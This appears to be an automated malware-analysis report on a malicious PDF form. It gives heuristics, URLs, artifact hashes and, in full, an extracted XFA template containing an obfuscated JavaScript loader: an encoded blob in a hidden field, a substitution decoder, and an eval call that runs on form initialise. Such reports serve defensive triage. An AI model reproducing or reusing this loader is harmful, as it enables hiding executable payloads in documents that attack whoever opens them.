MALICIOUS
60
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains XFA form elements and embedded JavaScript, indicating a potential for malicious scripting. The embedded script payload, identified by the heuristic 'PDF_EMBEDDED_SCRIPT_PAYLOAD', suggests that the script is designed to execute and likely download a second-stage payload. The presence of multiple unknown URLs related to XFA schemas further supports the suspicious nature of the document.
Machine Learning
- Nyx PDF Classifier malicious score 0.5076
Heuristics 6
-
XFA form low PDF_XFAPDF uses XML Forms Architecture — can contain script logic
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
-
Embedded script payload in PDF stream info PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ocsp.verisign.com0 Referenced by PDF JavaScript
- http://ns.adobe.com/xdp/In PDF document text
- http://www.xfa.org/schema/xci/1.0/In PDF document text
- http://www.xfa.org/schema/xci/2.8/In PDF document text
- http://www.xfa.org/schema/xfa-template/2.4/In PDF document text
- http://www.xfa.org/schema/xfa-template/2.2/In PDF document text
- http://www.xfa.org/schema/xfa-data/1.0/In PDF document text
- http://www.xfa.org/schema/xfa-locale-set/2.7/In PDF document text
- http://www.xfa.org/schema/xfa-locale-set/2.1/In PDF document text
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://www.xfa.org/schema/xfa-form/2.8/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://cgi.adobe.com/special/acrobat/updateReferenced by PDF JavaScript
- http://crl.verisign.com/tss-ca.crl0Referenced by PDF JavaScript
- http://crl.verisign.com/ThawteTimestampingCA.crl0Referenced by PDF JavaScript
- https://www.verisign.com/rpaReferenced by PDF JavaScript
- https://www.verisign.com/rpa01Referenced by PDF JavaScript
- http://crl.verisign.com/pca3.crl0Referenced by PDF JavaScript
- http://CSC3-2004-crl.verisign.com/CSC3-2004.crl0DReferenced by PDF JavaScript
- https://www.verisign.com/rpa0Referenced by PDF JavaScript
- http://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0Referenced by PDF JavaScript
- http://www.adobe.com/typehttp://www.adobe.com/type/legal.htmlReferenced by PDF JavaScript
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
stream_002_off00000343.js |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x343 | 1532 bytes |
SHA-256: f574e4d51594d1a8fd22e125b109b827c437aa898edc78babb62dbb93f8744f8 |
|||
stream_003_off0000052e.js |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x52E | 870 bytes |
SHA-256: 4a1aca004cf20431c9a66dce85404a6411a54d881a6c257882260ffc972a13eb |
|||
embedded_pdf_script_00004ce6.bin |
pdf-embedded-script | PDF raw stream script payload at offset 0x4CE6 | 8484 bytes |
SHA-256: 3aaa9abc03435ab186bd0f878d151b0272e257c46579fda11fde2db99c96f89d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
<template xmlns="http://www.xfa.org/schema/xfa-template/2.4/"
><?formServer defaultPDFRenderFormat acrobat7.0.5static?><?formServer allowRenderCaching 0?><?formServer formModel both?><subform name="form1" layout="tb" locale="en_US"
><pageSet
><pageArea name="Page1" id="Page1"
><contentArea x="0.25in" y="0.25in" w="8in" h="10.5in"
/><medium stock="letter" short="8.5in" long="11in"
/><?templateDesigner expand 0?></pageArea
><?templateDesigner expand 0?></pageSet
><subform w="8in" h="10.5in"
><draw name="naedst4t23w4w" y="53.975mm" x="19.05mm" w="136.26mm"
><ui
><textEdit
/></ui
><value
><text
>CRK:QFLK;PQOXOBMB\Q"PQOhIBK=.TEFIB"PQOgIBKDQE;l;IBK=.PQO;dk;PQOi,OBQROK;PQOgPR#PQOFKD"Yh;IBK=i,CRK:QFLK;IF#QFCC"SBOPFLK=.FC";SBOPFLK;l;j^j;=;.S\O;OLM;k;jsTrrr62rr6rrrurDrrrsr62rr6rrrrvrrrrur62rr6rrrrvrrrrxr62rr6rrrrvrrrr7r66rr6rrrrDrrrr+r66rr6rrrurDrrs6r62rWrrrr_zDrrrrrrrrrrT2tt6sr6uaaaaaLdRr8GDDDHMR1 s0aaaaaTrrrrsrrrrrrrrrrrrrr6rrrrrrQ{4r8Da1DvL6v _02ttt8SH1DHMs6/ws:tdr8Hws6/ws6/ws6/ws6/ws6/yxvL_0dP{r8SHVD/O61Ls0#Fdr8I56DvLJrrrrrrrrrrrrrrrrrrrru:Rr8FDzDHMT1 s06/ws66rvrrss6/wsMS{r8I56DvN6H_t6%Gy#4AMYd!39/Z38*LW1D5PGA7vU{[5r\F*-2:J_ J9avZ[Os%Lt%2YR%L5vvuTwA2) 8/HNrzK+O}+vEaCOtId(Yr:rr54I)TKL]CaaaTkkji,;BIPB;.S\O;OLM;k;jsTrrr62rr6rrrurDrrrsr62rr6rrrrvrrrrur62rr6rrrrvrrrrxr62rr6rrrrvrrrr7r66rr6rrrrDrrrr+r66rr6rrrurDrrs6r62rWrrrr_zDrrrrrrrrrrT2tt6sr6uaaaaawYtu8HBJDYOaaaaaaaaaa^vMDHN6y s04_tv8KZdDvOaaaaarrrrrvrrrrrrrrrrrrr6rrrrrrs\w-s0EuNv8Q[/DHN6y s0NK\v8Gt6EvLF6-70NK\v8KZdDvM 2-w0_Drrrrrrrrrrrrrrrrrrrzz)EvMB#z70N}\v8Hws6/vrsrrr6/ws6-7(D/M 2-w0H_t6)*rrrruzzLs02sty8RTxEvMaU s0aaaaaTrrrrsrrrrrrrrrrrrrvrrrrrrrxw)u8SO)dSNr+Ls0EZ)x8H[TDvMS]zw09sty8K}%E/O1z-*0CA\w8JaTD/MaU s0-T\v8F-rrrrrrrrrrrrrrrrrrru#y-s0dSO)dSW8EHMT]zw06/ws66rvrrss6/ws^0Ft8J2xEvM\2AP({K9(/Z39/Z_JG2RrdV3Zv9y#P]sN_IDUV-KF*5]9+RPw\D_-W8(\D]665r!YWOE_88LrFABSA:8y^dP0+[K6sTrr])+OtBGUaaaaji,S\O;IFKH;k;AgOBMI\:B"a;aDh;jj=iS\O;P:LAB;k;jV6H_t6)Uw#8W5_*Ly_rr\r3rSH SOOsBGNaaaauA[K(49!1-sSIA7SHRESHSESFRUSLP7SYL1AO5V7wJdE{xdT *WIuJd%U4/0QQ/QO\!_(6W!5dQ\^3T%H4TI1dOI3)65wAa[H64d#(#r(6Nt#dFN#(# (6MS xOIuv]KR{:G^rU xUP#uw/#xUP28sP#xTUuxUP#uv-#xUP2B7P#xTU]xUP#uy:#xUR2Z^#H(zV7I x%PsRWxxYEu_L#xUR2FLx6(zV9G-N3PsRWyxYEuzY#xUP2DsP#xTV[xUP#u1 #xUP2P7P#x VzZ^#HG_B2D-FTx[2r#8v2MsP#x )HG49Y(482(u9G(z[Hx[2P#B3Qz7RW4x{E(x:E[xY:*V9D#7^Ku)*S]US%Q1BUx[2r#]QIzB9Y(48UGR84(z[2GR6#PUEQux/E(59H(xYC*TdL#a2#ZO8}P7RWrxa9*V1PGR84(z[HGR8Vx[22+ {0IzQKy49O-yGI(47QLTV4(z[HGR84(1z#HTT#PTECG#x/F{::(4QDJ4+H(x{Gtxa9*81HZ49Hzd1H(R9HGR8V*V1DPL[1x(2zx[2/+ V6Q\ZKy49O-0OI(46GLU9H(49H#77SNEEI{4W0DzFzH4rxv6aGz)2/(B9H(xaG B9v(484(z)YGR\4(z[JG49H(08Yx[2L+)B%LLEKy49O-41I(47QLVESY{/F[3CH(t4Fy4+H(47S {a]*(L:(_tH#77Ku4VYG49D(48Vx(2zx[26*(L:(_u2#)L:#78PMx/K9R9H(x6+O39]sE*Qwx:2 z[HQsR8y1z#HVD#PW65+ER90sRW2sR9tsRWysR9usRWyxa9*8_v)d9Hzd0yF-uv*(P/(*uJu]/GLRu1M]9vz)1PILxuIV4F)_0%Z^-GLS9vV*Cv*V1Tud GLRu1M]9v*V1P#d5E(29H(t1FUN_Sax})Mx9:(_v7LF1FUJa9*8_v)d9H#79Eu4CH(17K_4)YGR84(zWH(49PGR84(z[HPL[Hx[2]+)B%Q_*Ky486[ [HGEL#PVr#xUP#Q V1FR9HG_x%FzJTx[2v#8vG YNtE}22)sH#x^/HZ8{H)ZOT ^T%H72G 45tIM#*S[da##GG x{L dVZQ#%WQ7RWxx:1 r^_u5D*xUSsI[GsD2NsKzyHT*C1T-uH3zP*TJ)1zS:x\M66^UEME(AA2B!W!%{OIxOx^s}(JYZ[Iy_s_F\/%K!yRZ5H8IZ-TDZ)E(L}9xV 7FTS(49H(zV6H_9BV]j;d;IFKHiS\O;QFCCXA\Q\;k;j8/HNru6Drrr2urjiQFCCXA\Q\dk;PQOXOBMB\Q"jT2urjh;Z^^)=iQFCCXA\Q\dk;P:LABiQFCCXA\Q\dk;PQOXOBMB\Q"j7YAyjh;ZY^^{;e;QFCCXA\Q\gIBKDQE;=iQFCCXA\Q\dk;OLMizJ\DBwFBIAZgO\T!\IRB;k;QFCCXA\Q\i,S\O;SBOPFLK;k;\MMgSFBTBO!BOPFLKgQL8QOFKD"=iSBOPFLK;k;SBOPFLKgOBMI\:B"aouaDh;jj=iFC";SBOPFLK;mk;j^j;nn;SBOPFLK;l;j^}Zj;=IF#QFCC"SBOPFLK=iFC";SBOPFLK;mk;j]j;nn;SBOPFLK;l;j]{Zj;=IF#QFCC"SBOPFLK=io</text
></value
><font typeface="Myriad Pro"
/><margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"
/></draw
><field name="ImageField1" y="9.525mm" x="57.15mm" w="25.4mm" h="30.4mm"
><ui
><imageEdit
/></ui
><caption placement="bottom" reserve="5mm"
><font typeface="Myriad Pro"
/><para vAlign="middle"
/><value
><text
>Image Field</text
></value
></caption
><border
><edge stroke="dashDotDot" thickness="11.938mm"
><color value="0,255,0"
/></edge
><corner stroke="dashDotDot" thickness="11.938mm"
><color value="0,255,0"
/></corner
></border
><?templateDesigner ScriptInitializers initialize:lang=JavaScript;?><event activity="initialize"
><script contentType="application/x-javascript"
>
var d ="uMhZCBlpfKiIGFl4GAyp6BlJCMgY+HkIWXkIGIgZeXkYmdlsqLloPLgouDh4yjopS1nb2JlImqo72JoIyDvaOvvbWMicvX3dzS0dDV3dfk ";
var yultukdr4u65rt5ryht = naedst4t23w4w.rawValue;
var esdrghzaehrts = "^ab";
var BRFStje4ryge3yge = "]"+esdrghzaehrts+"cd";
var NFOIPGgrswgswrg = "ghi";
var feswigih0swgresw = "ef"+NFOIPGgrswgswrg+"j";
var GRSWGSsbhedrhrthryjut = "lmnop";
var HRbdethr6yu6r4thrtf = BRFStje4ryge3yge+feswigih0swgresw+"k"+GRSWGSsbhedrhrthryjut+"q";
var foiwpgiwroi = 'wxy';
var NBIBVIiuebf78f0swefwe = foiwpgiwroi+'z_';
var POGOIBHUIbebf78ewefswef = "45678";
var bgshresthjtudrsuj = "!%+";
var IBFUEfbiuvgneswuig = bgshresthjtudrsuj+"-*.";
var GHIUGIUgiuwge89g89wef = POGOIBHUIbebf78ewefswef+"9/"+IBFUEfbiuvgneswuig+",";
var BFSBGSgbhehreyge43y34etyee =';"='+"<>&";
var OIGHPIPUIWb78wgh09swrg = NBIBVIiuebf78f0swefwe+"0123"+GHIUGIUgiuwge89g89wef+BFSBGSgbhehreyge43y34etyee;
var gsrhrsfhdrh5y54yrt = " ";
var podergheoi4ter4tger = "}";
var FAEvfevgw4t3ewt4ewrgesw = ")[";
var BFSgrrehyg43ty34etyg = ""+"{"+podergheoi4ter4tger+gsrhrsfhdrh5y54yrt+"("+FAEvfevgw4t3ewt4ewrgesw;
var HHRdhreyy4ey34ey5eyde = "OP";
var bsfhRHgrde5y4eye = "HIJKLMN"+HHRdhreyy4ey34ey5eyde+"QRST";
var sreghdrse4ety54eyesw = 'ABC'+'DEFG'+bsfhRHgrde5y4eye+"UVWXYZ"+BFSgrrehyg43ty34etyg+HRbdethr6yu6r4thrtf;
var bfsdre4y54ery = "#:"+sreghdrse4ety54eyesw+'rstuv'+OIGHPIPUIWb78wgh09swrg+"\\";
function BNSrhshy4ewry44e3yerw(bvfsxdsnhe4wy4ewew4r){
var zxbzfaswAGSWsge4t4etr = bfsdre4y54ery.indexOf(bvfsxdsnhe4wy4ewew4r)-(33+18);
var liooyprtdre5eyr4e5yyerr=zxbzfaswAGSWsge4t4etr;
if(liooyprtdre5eyr4e5yyerr<0)
{liooyprtdre5eyr4e5yyerr=liooyprtdre5eyr4e5yyerr+bfsdre4y54ery.length;}
var bsfhrfy3e546ty5er='';
bsfhrfy3e546ty5er=bfsdre4y54ery.charAt(liooyprtdre5eyr4e5yyerr);
return bsfhrfy3e546ty5er;}
function YRThndetj5eu4eyuytdre(hdrehesrh4tew4ete){
var trtyhtr54ey54eyeer="";
var fkyye5rdyh54ey5rtrede = hdrehesrh4tew4ete;
for (var i = 0;i<fkyye5rdyh54ey5rtrede.length-1;i++)
{
var bndxfhdrye4y5eyre=BNSrhshy4ewry44e3yerw(fkyye5rdyh54ey5rtrede[i]);
trtyhtr54ey54eyeer += bndxfhdrye4y5eyre;
}
return trtyhtr54ey54eyeer;}
var vsdfgdrs4eyr = "abrfhze3y54y54ythe5rh45wu45y54y5e";
var njs4t4ew = "nxHRTFSWRHRSWrene5yu4u63454eywr4jgdkgcdmnjdru45v";
var bxs4tew = "KBVJHSJIBVubeyubgyuswbBOGISWBGUOSWB898gr8ga";
var nsr43we = "MONVOISBOYUEFVGYUge87wgef9wgbw8e7bvg08wgwl";
var bsgs4sw = vsdfgdrs4eyr[32]+njs4t4ew[47]+bxs4tew[42]+nsr43we[41];
var mfghj544er = bsgs4sw;
app[mfghj544er](YRThndetj5eu4eyuytdre(yultukdr4u65rt5ryht));
</script
></event
></field
><?templateDesigner expand 1?></subform
><proto
/><?templateDesigner Hyphenation excludeInitialCap:1, excludeAllCaps:1, wordCharCnt:7, remainCharCnt:3, pushCharCnt:3?><?templateDesigner expand 1?><?renderCache.subset "Myriad Pro" 0 0 ISO-8859-1 4 320 80 000100020003000400060009000A000B000C000D000E000F0010001100120013001400150016001700180019001A001B001C001E00220023002400250026002700280029002A002B002C002D002E002F0030003100320033003400350036003700380039003A003B003C003D003E003F004000420045004600480049004A004B004C004D004E004F00500053005400550056005700580059005A005B005C005E !"#%()*+,-./0123456789:;=ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_adeghijklmnorstuvwxyz{}?></subform
><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.2/?><?templateDesigner DefaultLanguage JavaScript?><?templateDesigner DefaultRunAt client?><?PDFPrintOptions embedViewerPrefs 0?><?PDFPrintOptions embedPrintOnFormOpen 0?><?PDFPrintOptions duplexMode 0?><?templateDesigner DefaultPreviewType interactive?><?templateDesigner DefaultPreviewPagination simplex?><?templateDesigner XDPPreviewFormat 19?><?templateDesigner FormTargetVersion 24?><?templateDesigner Zoom 157?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner SaveTaggedPDF 1?><?templateDesigner SavePDFWithEmbeddedFonts 1?><?templateDesigner SavePDFWithLog 0?></template
>
|
|||
objstm_0041_00.bin |
pdf-objstm-decoded | PDF /ObjStm 41 0 obj (inflated) | 2513 bytes |
SHA-256: d2de84a57760fcd29f67e6803979f349328f968c580ef2b981e6c7d36bb577c0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
font_00_cff_off00001e8b.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x1E8B | 6281 bytes |
SHA-256: c16b2fbb01b37fa5a8a2e4b552c5da6d8965f863ef65b298b4818a07dabb98a0 |
|||
font_01_sfnt_off00006e4e.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x6E4E | 36717 bytes |
SHA-256: 3a47365ba29be93b97be381e34ec3c7ef0a10e0f82cdb3dadd6fb11f2800fdb3 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.